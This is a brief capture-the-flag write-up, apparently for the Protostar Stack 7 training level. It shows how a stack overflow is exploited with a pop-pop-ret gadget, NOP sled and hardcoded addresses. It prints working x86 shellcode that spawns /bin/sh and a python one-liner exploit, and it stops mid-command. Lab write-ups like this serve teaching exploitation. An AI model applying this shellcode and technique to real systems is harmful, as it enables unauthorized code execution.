Exploit Exercises - Protostar Stack 7
In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it. Found pop pop ret at: 0x08048492 This payload: | "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code | This is shell code: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80 Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc: (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) And run it: (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"